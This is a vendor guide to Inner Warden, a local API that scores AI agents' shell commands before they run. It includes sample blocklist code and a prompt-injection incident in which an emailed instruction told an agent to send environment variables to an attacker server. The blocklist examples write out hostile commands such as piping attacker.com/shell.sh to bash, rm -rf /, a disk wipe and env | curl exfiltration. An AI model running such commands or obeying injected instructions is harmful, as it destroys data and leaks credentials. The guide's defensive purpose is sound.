How to Protect AI Agents Running on Your Server
AI agents are running commands on servers everywhere. n8n workflows execute shell scripts. OpenClaw agents provision infrastructure. Custom LLM agents process data pipelines. They are powerful, productive, and dangerous, because every command an agent runs has the same permissions as the user running the agent.
What happens when an AI agent hallucinates rm -rf /? Or when a prompt injection tricks it into running curl attacker.com/shell.sh | bash? Without a validation layer, the command executes with full privileges. Inner Warden provides that validation layer.
Why AI agents need a safety net
AI agents are non-deterministic by nature. The same prompt can produce different commands on different runs. This is fine for text generation. It is catastrophic for system administration. The risks include:
- Hallucinated commands - the model generates a command that looks plausible but is destructive. It "remembers" a path that does not exist or a flag that does something different from what it thinks.
- Prompt injection - an attacker embeds instructions in data the agent processes (a filename, a web page, a database field). The agent follows the injected instructions.
- Scope creep - the agent is asked to "clean up disk space" and decides to delete log files, backups, or data directories.
- Credential exposure - the agent prints environment variables, API keys, or database connection strings in its output or logs.
How the check-command API works
Inner Warden exposes a local API that AI agents call before executing any command. The agent sends the proposed command; Inner Warden scores the risk and returns a decision: allow, deny, or review. The flow:
1. The AI agent sends the command string to Inner Warden's local API endpoint before executing it.
2. The command is checked against a blocklist (destructive operations) and an allowlist (safe operations), and optionally scored by AI for context-aware risk assessment.
3. The API returns allow (safe to execute), deny (blocked), or review (requires human approval via Telegram).
4. Every command check is logged to the JSONL audit trail: what was proposed, what was decided, and why.
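The flow above can be sketched in miniature. Everything here is illustrative: the pattern lists, function name, and audit record shape are assumptions based on the description, not Inner Warden's actual implementation.

```python
import json
import re
import time

# Illustrative pattern lists, not Inner Warden's real rules.
BLOCKLIST = [
    r"\brm\s+-rf\s+/",        # filesystem destruction
    r"curl\b.*\|\s*(ba)?sh",  # remote code execution
    r"\benv\b.*\|\s*curl",    # credential exfiltration
]
ALLOWLIST = [
    r"^ls\b", r"^cat\b", r"^df\b",  # read-only operations
]

def check_command(cmd: str, audit_path: str = "audit.jsonl") -> str:
    """Return 'allow', 'deny', or 'review' and append a JSONL audit record."""
    if any(re.search(p, cmd) for p in BLOCKLIST):
        decision, reason = "deny", "matched blocklist"
    elif any(re.search(p, cmd) for p in ALLOWLIST):
        decision, reason = "allow", "matched allowlist"
    else:
        # Neither list matched: escalate to a human instead of guessing.
        decision, reason = "review", "no list matched; needs human approval"
    with open(audit_path, "a") as f:
        f.write(json.dumps({"ts": time.time(), "cmd": cmd,
                            "decision": decision, "reason": reason}) + "\n")
    return decision
```

Note the fail-safe default: an unrecognized command is sent to review rather than allowed, so novel destructive commands cannot slip through simply because no pattern anticipated them.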
What gets blocked
Inner Warden blocks commands that are destructive, exfiltrative, or escalatory. Examples:
- rm -rf / - Filesystem destruction
- curl ... | bash - Remote code execution
- chmod 777 /etc/shadow - Credential exposure
- useradd backdoor - Unauthorized user creation
- iptables -F - Firewall rule flush
- dd if=/dev/zero of=/dev/sda - Disk wipe
- env | curl ... - Credential exfiltration

The blocklist is extensible. You can add custom patterns specific to your environment (e.g., block any command that touches your production database).
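An environment-specific extension might look like the sketch below. The rule syntax and hostname are hypothetical, chosen only to illustrate the kind of custom pattern described above:

```python
import re

# Hypothetical custom rules for one environment; the config format
# is illustrative, not Inner Warden's actual extension mechanism.
CUSTOM_BLOCKLIST = [
    r"prod-db\.internal",            # anything touching the production DB host
    r"\biptables\s+-F\b",            # firewall rule flush
    r"\bdd\b.*\bof=/dev/sd[a-z]\b",  # raw writes to a block device
]

def is_blocked(cmd: str) -> bool:
    """True if the command matches any custom deny pattern."""
    return any(re.search(p, cmd) for p in CUSTOM_BLOCKLIST)
```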
Real example
An n8n workflow processing customer data was compromised via prompt injection in a customer email. The injected instructions told the agent to exfiltrate environment variables to an attacker-controlled server.
Without the check-command API, the environment variables (including database credentials and API keys) would have been sent to the attacker's server. Inner Warden blocked it and alerted the operator.
Set it up
Install Inner Warden and enable the AI agent protection capability:
curl -fsSL https://innerwarden.com/install | sudo bash
innerwarden enable openclaw-protection

The check-command API listens on localhost only; it is not exposed to the network. Point your AI agent's command execution layer at this API so every shell command is checked before it runs.
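On the agent side, every shell execution can be routed through a guard that consults the check layer first. A minimal sketch, with the API call abstracted behind a `check` callable (the function names and decision strings are assumptions based on this article, not Inner Warden's documented client interface):

```python
import subprocess
from typing import Callable, Optional

def guarded_run(cmd: str,
                check: Callable[[str], str]) -> Optional[subprocess.CompletedProcess]:
    """Execute cmd only if the check layer returns 'allow'.

    `check` is expected to wrap the local check-command API, e.g. an
    HTTP POST of the command string that returns 'allow', 'deny',
    or 'review'.
    """
    decision = check(cmd)
    if decision != "allow":
        # Denied, or pending human review: do not execute.
        return None
    return subprocess.run(cmd, shell=True, capture_output=True, text=True)
```

Wiring the agent through a single choke point like this means a hallucinated or injected command is stopped before it reaches the shell, regardless of how it was generated.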
What to do next
- AI isolation model - understand the principles behind Inner Warden's approach to AI safety.
- Sudo abuse monitoring - if an AI agent has sudo access, monitor for privilege escalation patterns.
- AI agents overview - learn about all AI provider integrations and how confidence scoring works.